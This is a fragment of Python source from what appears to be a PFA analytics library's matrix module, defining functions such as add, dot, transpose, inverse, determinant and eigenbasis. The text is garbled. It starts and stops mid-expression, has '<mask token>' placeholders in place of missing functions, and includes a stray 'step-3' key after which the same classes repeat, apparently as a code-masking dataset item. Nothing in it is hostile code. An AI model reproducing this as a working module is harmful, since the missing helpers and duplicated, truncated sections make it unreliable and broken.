Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Array(P.Double()))}, {'fcn': P.Fcn([P.Double(), P.Double()], P.\n Double())}], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(\n P.Double()))}, {'y': P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.\n Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip\n (xi, yi)] for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {\n }).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for\n i in rows)\n\n\n<mask token>\n\n\nclass Add(LibFcn):\n name = prefix + 'add'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) 
!= len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj + yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi + yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Sub(LibFcn):\n name = prefix + 'sub'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj - yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n 
raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi - yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = 
any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, 
self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise 
PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise 
PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise 
PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) 
for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef np():\n import numpy\n return numpy\n\n\ndef rowKeys(x):\n return set(x.keys())\n\n\ndef colKeys(x):\n if len(x) == 0:\n return set()\n else:\n return reduce(lambda a, b: a.union(b), [set(xi.keys()) for xi in\n list(x.values())])\n\n\n<mask token>\n\n\ndef arrayToRowVector(x):\n return np().matrix(x, dtype=np().double).T\n\n\n<mask token>\n\n\ndef matrixToMaps(x, rows, cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x\n .tolist()))\n\n\n<mask token>\n\n\ndef raggedMap(x):\n return len(set(len(xi) for xi in list(x.values()))) != 1\n\n\nclass MapApply(LibFcn):\n name = prefix + 'map'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'fcn': P.Fcn([P.\n Double()], P.Double())}], P.Array(P.Array(P.Double()))), Sig([{'x':\n P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.Double()], P.Double())}\n ], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x\n ]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for \n j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass Scale(LibFcn):\n name = prefix + 'scale'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'alpha': P.Double()}], P.\n Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))}, {\n 'alpha': P.Double()}], P.Array(P.Array(P.Double()))), Sig([{'x': P.\n Map(P.Double())}, {'alpha': P.Double()}], P.Map(P.Double())), Sig([\n {'x': P.Map(P.Map(P.Double()))}, {'alpha': P.Double()}], P.Map(P.\n Map(P.Double())))])\n errcodeBase = 24010\n\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[(xj * alpha) 
for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [(xi * alpha) for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items\n ()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass ZipMap(LibFcn):\n name = prefix + 'zipmap'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Array(P.Double()))}, {'fcn': P.Fcn([P.Double(), P.Double()], P.\n Double())}], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(\n P.Double()))}, {'y': P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.\n Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip\n (xi, yi)] for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {\n }).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for\n i in rows)\n\n\n<mask token>\n\n\nclass Add(LibFcn):\n name = prefix + 'add'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, 
{'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj + yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi + yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Sub(LibFcn):\n name = prefix + 'sub'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and 
isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj - yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi - yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 
0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for 
